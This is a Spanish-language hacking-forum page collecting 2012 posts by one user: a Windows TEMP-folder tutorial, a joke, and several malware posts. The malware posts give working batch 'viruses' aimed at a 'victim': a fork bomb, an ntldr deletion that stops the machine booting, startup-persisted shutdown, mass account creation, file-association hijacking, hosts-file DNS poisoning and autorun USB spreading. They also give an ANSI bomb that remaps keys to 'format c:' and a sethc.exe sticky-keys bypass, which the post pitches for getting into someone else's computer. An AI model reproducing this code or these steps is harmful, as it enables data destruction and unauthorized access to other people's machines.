Mostrar Mensajes

Esta sección te permite ver todos los posts escritos por este usuario. Ten en cuenta que sólo puedes ver los posts escritos en zonas a las que tienes acceso en este momento.

Temas - Raven

Páginas: [1]

Presentaciones / Yo! im back

« en: Septiembre 25, 2012, 03:44:47 pm »

Tras largos meses de ausencia.. al fín estoy de vuelta.

Windows / Cambiar dirección de archivos Temporales de windows (XP, Vista y Win7)

« en: Abril 02, 2012, 07:02:54 pm »

Primero, algo de información:

Siempre que se habla acerca de espacio libre en el disco lo primero que se nos viene a la mente es limpiar la carpeta TEMP. Algunos pueden estar preguntándose: ¿Qué es la carpeta TEMP, y para qué sirve?

La carpeta “TEMP”, así como el nombre lo dice, es la carpeta en la cual se almacenan todos los archivos temporales creados por el sistema y los archivos temporales creados por algunos software de terceros, y como estos archivos almacenados en la carpeta TEMP son temporales, su eliminación es completamente segura.

Ahora, existen dos carpetas de archivos temporales (una para el sistema operativo y otra para el usuario). ¿Cómo acceder a esas carpetas?... si presionas las teclas Windows+r se abrirá la ventanita del run, escribe: %windir%\temp y presiona enter para abrir el temp de los archivos del SO, y si quieres abrir la carpeta donde se almacenan los archivos temporales del usuario, en el run escribe: %temp%

Nota: Todos los usuarios en windows tienen su propia carpeta de archivos temporales ya que los perfiles no son iguales y por lo tanto el uso que cada usuario haga del software instalado en la computadora mucho menos.

Bueno, basta de tanta palabrería y vamos directo al grano. ¿Cómo cambiar la dirección de almacenamiento de los archivos temporales?

Es muy simple, solo presiona las teclas Windows+r (para el run), y escribe: sysdm.cpl para abrir la ventanita de propiedades del sistema.

Después selecciona opciones avanzadas > variables de entorno.

En la ventanita que aparecerá debes identificar las variables TEMP y TMP tanto en variables de usuario como en variables del sistema:

Ahora, de momento ve hacia la ruta en la que quieres que se guarden los archivos temporales, en mi caso los guardaré en otra partición, es decir en la unidad E, para ello creo una carpeta llamada TEMP dentro de E:

Una vez creada la carpeta, dirígete de nuevo a la ventanita de variables de entorno y selecciona la variable TEMP dentro de variables del sistema, haz clic en editar y escribe la nueva dirección en la que guardarás los archivos temporales (en mi caso E:\TEMP), y haz lo mismo con la variable TMP. Después selecciona la variable TEMP dentro de variables de usuario y repite el paso con la otra variable TMP.

Al final quedará algo como esto:

Nota: Si solo quieres modificar la dirección donde se almacenan los archivos temporales de los usuarios y no del sistema entonces solo edita las variables TEMP y TMP dentro de variables de usuario.

Después de haber realizado todos los pasos correctamente, reinicia tu computadora y listo.

Saludos!

Batch / Bash / [Batch] Windows 7 DNS Poisoning.

« en: Marzo 24, 2012, 05:37:04 pm »

En vista de que en mi anterior post de: ¿Qué tan peligroso puede ser un virus en batch? hubo algunas dudas con la parte de DNS poisoning y que a algunos no les andaba el metodo, hice este pequeño code para que lo ejecuten y haga todo de manera más automatizada y sea más entendible.

Código: [Seleccionar]

@echo off
title -DNS POISONING-
:menu
cls
echo -------------------------------------------------------
echo +         DNS POISONING FOR WIN7 - by Raven           +
echo -------------------------------------------------------
echo.
echo.
echo Opciones:
echo 1.- Respaldar Archivo hosts.
echo 2.- Envenenar DNS's.
echo 3.- Restablecer Archivo hosts.
echo 4.- Salir.
set /p x=Selecciona una opcion:
if %x%==1 (goto :opc1) else if %x%==2 (goto :opc2) else if %x%==3 (goto :opc3) else if %x%==4 (goto :salir) else echo Esa opcion no existe, intentalo de nuevo.
pause
goto menu
:opc2
set /p v1=Escribe la ip o direccion de redireccionamiento:
set /p v2=Escribe la ip o direccion que sera redireccionada:
echo %v1% %v2% >> %windir%\system32\drivers\etc\hosts
echo Archivo modificado satisfactoriamente.
pause
goto menu
:opc1
copy %windir%\system32\drivers\etc\hosts  C:\Users\%username%\Desktop\hosts
pause
goto menu
:opc3
copy /Y C:\Users\%username%\Desktop\hosts %windir%\system32\drivers\etc\hosts
pause
goto menu
:salir
echo Bye Bye!, %username%.. Happy hacking.
pause>null

bueno, la explicación del código me la salto, ya que esta bastante sencillo de entender. pero si alguien tiene alguna duda, pregunten y con gusto responderé. Por cierto, no se olviden de ejecutar el .bat con derechos de administrador. Saludos!

Hacking / Windows 7 Admin account Xploit

« en: Febrero 06, 2012, 06:37:56 pm »

Hola familia de HxC, en esta ocasión les traigo este ya conocido xploit de windows 7, el cual nos permite crear o modificar una cuenta de administrador en el sistema (muy util cuando hayas olvidado tu contraseña y quieras acceder de nuevo, y mas util cuando quieras acceder a la computadora de alguien mas mientras no este en casa

)..

Bueno sin mas preámbulos aquí están los pasos a seguir:

1.- Cuando enciendas la computadora presiona el botón de encendido del pc (para apagar y generar un error) mientras el logo de windows este en curso.

2.- Enciende la computadora de nuevo.

3.- Ahora deberás ver una opción de reparación de inicio, selecciónala y presiona enter.

4.- Corre la reparación de inicio.

5.- Ahora en la ventanita veras que dice algo como: "buscando problemas", ese mensaje cambiará a: "intentando reparar errores" o algo asi.

6.- deja que la computadora haga todo el proceso, tardará al rededor de unos 5-30 min dependiendo de la computadora.

7.- Después de ese tiempo, la computadora mandara un mensaje diciendo: "reparación de inicio no pudo reparar el problema". Ahora verás que hay una parte en la que dice: "mostrar detalles del problema", veras que hay un archivo con la extensión .txt.. ábrelo.

8.- Ahora en el bloc de notas que se ha abierto, ve a archivo > abrir. Ve y busca esta ruta: C:\Windows\system32

9.- Una vez situado en esta carpeta busca la aplicación: sethc.exe y re-nombrala con algún nombre de tu preferencia.

10.- Ahora copia cmd.exe y a la copia generada renombrala a: sethc.exe.

11.- Reinicia la computadora, y en la pantalla del login presiona shift 5 veces sucesivamente. Ahora se abrirá la consola de coman-dos, en ella escribe: "control userpasswords2" (sin comillas), y ahora podras crear una cuenta de administrador o simplemente hacer tu cuenta de tipo Administrador.

Salu2.

Off-Topic / Descarga desde Megashare, fileserve y oron como si fueras premium!

« en: Febrero 06, 2012, 06:59:16 am »

Navegando por ahí me encontré con una interesante pagina la cual te genera links premium para descargar desde varios host de descargas, ademas de eliminar el molesto tiempo de espera. Su utilización es simple, solo hay que pegar el link y después esperar a que genere el link premium para empezar con la descarga. aquí les dejo la pagina:

http://qfi.im/

Presentaciones / Al fin me presento.

« en: Febrero 05, 2012, 04:54:34 pm »

Hola familia de HxC, ya tengo tiempo molestando aquí, sin embargo nunca me había presentado como es debido (soy un poco despistado

). Bueno.. Espero ser parte de esta gran comunidad y obviamente caerle bien a todos xD (aunque creo que ya me regañaron por poner letras en marrón

). Mis gustos van mas orientados a la programación en batch al igual que la generación de malware en el mismo lenguaje. No soy experto, y me queda mucho por aprender y si me equivoco me da gusto que me lo hagan saber. Acepto cualquier tipo de critica (siempre y cuando sea buena

... nah broma, cualquier critica es buena

).. me gusta bromear y me gusta aprender nuevas cosas.. en fin, yo soy Raven de HxC (OMG

¿en serio?, si no fuera porque puedo ver el nombre en el foro no me doy cuenta).

Investigación de Malware / ¿Que tan peligroso puede ser un virus en batch?

« en: Enero 29, 2012, 04:45:11 pm »

Si te preguntas que es lo que puede hacer un virus en batch esta sería una respuesta rápida:
Un virus en batch puede eliminar archivos del sistema operativo, Formatear, robar información, molestar a una victima, consumir recursos del CPU y de esa manera afectar el rendimiento, des-habilitar firewalls, abrir puertos, modificar y destruir el registro entre muchas otras cosas..

Ahora.. algunos ejemplos sencillos de virus en batch:

Bombardeo de Aplicaciones.

Código: [Seleccionar]

 
@echo off
:x  
start mspaint
start notepad
start write
start cmd
start explorer
start control
start calc
goto x

Explicación: lo que hace este código es simplemente abrir interminablemente dichas aplicaciones en un ciclo infinito, lo cual generará un gran consumo de memoria y puede incluso colgar el sistema por un rato.

Flooder de carpetas:

Código: [Seleccionar]

@echo off
:x
md %random%
goto x

Explicación: Este codigo al igual que el anterior, posee un ciclo infinito en el cual crea carpetas en el sistema de manera aleatoria, lo cual consume espacio en el disco duro.

Flooder de cuentas de usuario:

Código: [Seleccionar]

@echo off
:x
net user %random% /add
goto x

Explicación: este simplemente crea una infinidad de usuarios en el sistema, Lo cual es bastante molesto.

Virus de apagado:

Código: [Seleccionar]

copy virus.bat “C:\Documents and Settings\Administrator\Start Menu\Programs\Startup”
copy virus.bat “C:\Documents and Settings\All Users\Start Menu\Programs\Startup”
shutdown -s -t 00

Explicación: Como los archivos en la carpeta de start up (o inicio) automáticamente se inician, lo que hará este virus sera apagar la computadora de la victima una vez iniciada la sesión de usuario en un tiempo de 0 segundos. ahora si lo quieres aplicar en w7 tendrias que remplazar las dos primeras lineas por esta:

Código: [Seleccionar]

C:\Users\sys\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
Eliminador de arranque (peligroso):

Código: [Seleccionar]

attrib -S -R -H C:\ntldr
del ntldr

Explicación: Este codigo simplemente cambia los atributos del ntldr (sistema, y oculto), para así poder eliminarlo, y una vez eliminado la próxima vez que se encienda el ordenador este simplemente no "booteara" ya que falta ese archivo de arranque.

Fork Bomb:

Código: [Seleccionar]

%0|%0

Explicacion: Este simplemente creara un numero infinito de procesos en el sistema, lo cual hara que este se cuelgue.

Modificador de extensiones:

Código: [Seleccionar]

@echo off
assoc .txt=loquequieras
assoc .exe=loquequieras
assoc .jpeg=loquequieras
assoc .png=loquequieras
assoc .mpeg=loquequieras

Explicación: Este sencillo codigo nos permitirá joder con las asociaciones de los archivos, para usarlo solo hay que cambiar loquequieras por la asociación que quieres cambiar, como ver asociaciones de archivos?.. simple solo ejecuta este comando en la shell del sistema: assoc

DNS poisoning:

Código: [Seleccionar]

@echo off
echo xxx.xxx.xxx.xxx www.loquequieras.com > C:\windows\system32\drivers\etc\hosts

Explicación: Este comando imprime o agrega xxx.xxx.xxx.xxx www.loquequieras.com al archivo host. para usarlo correctamente debes de remplazar xxx.xxx.xxx.xxx por una ip y www.loquequieras.com por algún sitio de tu preferencia, lo que hace es que puedes re-direccionar a la victima hacia algún site en especifico, en otro caso simplemente con meter alguna ip falsa puedes bloquearle el acceso a dicho site.

¿Como meter un virus en batch mediante una USB?
la forma mas sencilla seria creando un archivo .inf, para que al momento de conectar la memoria al ordenador quede infectado al reconocerla.

Código: [Seleccionar]

[autorun]
open=tubatch.bat

Nota: los archivos .inf se crean de la misma forma que los .bat solo que al momento de guardarlos en vez de .bat se le pone .inf. Ahora, donde dice tubatch.bat debes de remplazarlo por el nombre de tu virus en batch.

Bueno amigos, espero que les guste ^^

Off-Topic / Para reír un rato - Usuario afligido.

« en: Enero 29, 2012, 03:40:36 pm »

Señor Encargado de Soporte Técnico..

Hace un año y medio cambié de la versión Novia 7.0 a Esposa
1.0 y he observado que el programa inició un proceso inesperado de
subrutina llamado Hijo, que me ocupó mucho espacio y recursos importantes y
eso que el programa también ocupa muchísimo disco duro. En el folleto
explicativo del programa NO viene mención alguna a este fenómeno.

Por otra parte, Esposa 1.0 se auto instala como residente en todos los demás programas y, durante el inicio de cualquier otra aplicación, se lanza monitoreando todas las actividades del sistema. Aplicaciones como: Cerveza con Amigos 10.3, Noche de Tragos 2.5, y Fútbol Dominguero 5.0 ya no funcionan, y el sistema se cuelga cada vez que intento cargarlos.

De vez en cuando, se lanza un programa oculto (¿Virus?) denominado Suegra 1.0 que parece residente en memoria y que consigue colgar el sistema o que Esposa 1.0 se comporte de manera totalmente impredecible, por ejemplo, dejando de atender a cualquier comando que introduzco. No he logrado desinstalar este residente. Aparentemente, no puedo lograr mantener a Esposa 1.0 en minimizado al correr alguna de mis aplicaciones favoritas.

Estoy pensando en poder volver al programa anterior Novia 7.0, pero no me funciona el Desinstalar. (¿Me podría ayudar?).

Gracias,

Usuario afligido

RESPUESTA

Estimado Usuario..

Este es un motivo de queja muy común entre los usuarios, pero se debe en la mayoría de los casos a un error básico de concepto: Mucha gente pasa de cualquier versión de Novia X.0 a Esposa 1.0 con la idea de que Esposa 1.0 es sólo un programa de 'Entretenimiento y utilidades'. Sin embargo, Esposa 1.0 es un SISTEMA OPERATIVO completo y su creador lo diseñó para controlar todo el sistema.
Es muy poco probable que pueda Ud. desinstalar a Esposa 1.0 y regresar a cualquier versión de Novia X.0. Hay archivos operativos ocultos en su sistema que harían que Novia X.0 emulara a Esposa 1.0, así que no se gana nada.

Es imposible desinstalar, eliminar, o purgar los archivos del programa una vez instalados. No puede volver a Novia X.0 porque Esposa 1.0 no está programado para eso. Lo mismo pasa con Suegra 1.0 que es una aplicación oculta que se auto instala en el sistema mientras Esposa 1.0 funciona.

Hay quienes han intentado el formateo total del sistema para luego instalar los programas Novia Plus o Esposa 2.0 pero terminan con más problemas que antes. Lea en el manual, el apartado precauciones, capítulos: Pago de alimentos y pensiones; Mantenimiento de hijos.

Por otro lado, si cambia a Novia 8.0 no intente luego pasar a Esposa 2.0 porque los problemas que provoca este nuevo sistema operativo no son idénticos, sino peores, que los de Esposa 1.0. Aunque existe una versión Esposa 3.0 e incluso 4.0, son programas reservados a especialistas, de altísimo costo y no son aconsejables para el usuario normal.

Si todos fallan, es preferible optar por sistemas basados en plataformas completamente diferentes, pero yo le recomiendo que mantenga a Esposa 1.0 y maneje la situación lo mejor posible.

Personalmente, tengo también instalado a Esposa 1.0 y le sugiero que estudie toda la sección del manual sobre Fallos Generales de Sociedad (FGS's). Esposa 1.0 es un programa muy sensible a los comandos y funciona en modo protegido contra fallos. Esto significa que Ud. deberá asumir la responsabilidad por cualquier problema que se produzca independientemente de su causa, porque el programa siempre considerará que cualquier fallo en el sistema es debido a un mal uso por parte del usuario.

Uno de los mejores recursos es la aplicación del comando:
C:PEDIR PERDÓN.exe en cuanto se produzca un problema o el sistema se cuelgue.

No reinicie el sistema porque seguirá sin funcionar. Evite el uso excesivo de la tecla ESC o SUPR, porque luego deberá aplicar el comando PEDIR PERDÓN.exe/flores /All para que el programa vuelva a funcionar normalmente. El sistema funcionará bien mientras usted cargue con todas las culpas por los FGS's.

Esposa 1.0 es un programa muy interesante, pero con un alto costo de mantenimiento. Considere la posibilidad de instalar algún software adicional para mejorar el rendimiento de Esposa 1.0. Le recomiendo Flores 5.0, Joyitas 2.3 y, en último caso, Viaje de Vacaciones 3.2; también puede usar Simiamor 8.0 o Loquetúdigas 14.7. Estos son programas Shareware muy difundidos en Internet y que funcionan muy bien como residentes y los puede obtener casi en cualquier sitio web.

Jamás instale Secretariaconminifalda 3.3, Amiguita 1.1 o Amigotes 4.6. Estos programas no funcionan en el ambiente Esposa 1.0 y probablemente causen daños irreversibles al Sistema operativo.

Mucha suerte.

Servicio Técnico.

Investigación de Malware / ANSI Bomb - Windows

« en: Enero 29, 2012, 07:19:38 am »

¿Que es un ANSI Bomb?
un ANSI bomb no es necesariamente un virus (aunque actúa como uno), ya que es mas un exploit. Es una secuencia de caracteres que re-programan varias funciones del teclado de la computadora con los dispositivos de la consola ANSI.

¿Como funciona un ANSI Bomb?
Un ANSI Bomb es escrito mediante un editor de texto, como lo es el bloc de notas, y entonces guardado con un formato .bat (archivo Batch). Un ANSI Bomb re-direcciona unas cuantas letras del teclado. El código que les mostraré a continuación re-direcciona la letra C (la cual se refiere a la unidad C de disco local, es decir.. tu disco duro), la tecla enter, y la tecla espacio. Ademas del usar el comando "Format C:" y como extra re-direcciona las teclas n/N a y/Y.

¿Cual es el punto?
Bueno, el punto (como siempre) no es más que el conocimiento de dicho código, sin embargo lo puedes usar para bombardearle el disco duro a alguien que te cae mal y borrarle su contenido, etc etc... nah broma, ese no es el propósito original de esto, y mucho menos te sugiero que lo hagas, ya que como dije.. esto solo se trata de conocimiento, no de joder.

Entonces.. ¿Que hace este ANSI Bomb?
Cuando la victima abra el batch, el exploit se activa. Cuando la victima presione cualquiera de la teclas re-direccionadas, este les mandará un mensaje preguntando si se desea formatear el disco duro, obviamente el usuario optará por la opción de no formatear el disco duro, por lo cual presionará la tecla n/N pero aquí es donde viene lo interesante, cuando el usuario presione la tecla n/N esta sera tomada como y/Y al igual que si presiona y/Y con lo cual se estaría comenzando el proceso de bombardeo en el disco duro (es decir, o se jode o se jode).

Ahora si, el código es el siguiente (Nota, bajo ningún motivo lo usen con su pc, y en algunos casos el antivirus lo detectara como troyano):

Código: [Seleccionar]

ESC[99;"format c:";13p
ESC[66;"format c:";13p
ESC[121;121;13p
ESC[89;89;13p
ESC[110;121;13p
ESC[78;89;13p
ESC[8;format c:";13p
ESC[0;0;89;13p
ESC[3;89;13p
ESC[100;"copy key.ans c:\";13;"copy con c:\autoexec.bat";13;"type key.ans";13;26;13;"cls";13p
ESC[68;"copy key.ans c:\";13;"copy con c:\autoexec.bat";13;"type key.ans";13;26;13;"cls";13p
ESC[116;"copy key.ans c:\";13;"copy con c:\autoexec.bat";13;"type key.ans";13;26;13;"cls";13p
ESC[84;"copy key.ans c:\";13;"copy con c:\autoexec.bat";13;"type key.ans";13;26;13;"cls";13p
ESC[0;59;"im Loling from where im right now! x3)"p

Agregado:

Ahora les dejo una tabla con los códigos numéricos a utilizar para un ANSI Bomb: Descargar

Off-Topic / Cómo hackear los resultados de búsqueda de Google+

« en: Enero 27, 2012, 07:13:04 pm »

La dependencia de Google en Google+ en lugar de otras redes sociales más populares, ha sido objeto de críticas, una de ellas es que promueve su propio producto en vez de mostrar la información más relevante y actual. Sin embargo existe un hack para hacer que Google utilice la búsqueda de Google+ y muestre información de otras redes sociales más populares. Esto según la página:
www.focusontheuser.org

Para utilizar este hack se necesita tener abierta una pestaña con el buscador de Google de estados unidos, es decir… http://www.google.com/webhp?hl=us

Puedes buscar algo como por ejemplo: movies (pongo movies en vez de películas porque el truco de la búsqueda de Google+ no se aplica al español).

Ahora hay que ingresar a la página de https:www.focusontheuser.org

Una vez en la pagina hay que darle clic al botón: “Try a more relevant google”, veras que se abrirá una ventanita de color negro, en ella aparecerá el botón que dice: “don't be evil”, en el cual debemos de hacer clic y sin soltar arrastrarlo hasta la pestaña de Google.

Ahora después de algunos segundos, el buscador nos mostrará no solamente información de Google+, sino también de Facebook, twitter, tumbler, myspace entre otros.

Nota: Con este truco no podemos buscar directamente a una persona, pero si se quiere saber qué artistas de la industria de la música han actualizado su información en alguna de sus redes sociales, tan solo busca: music, y veras como aparece la información más actual y relevante de los artistas (pero no de alguno en especifico), esto gracias a que la búsqueda de Google+ toma como referencia la palabra que escribas y busca a las personas que se relacionen con esa palabra, ya sean músicos, escritores, actores etc.

Ejemplos:

Personalmente considero este hack un tanto inútil, pero es algo interesante

Páginas: [1]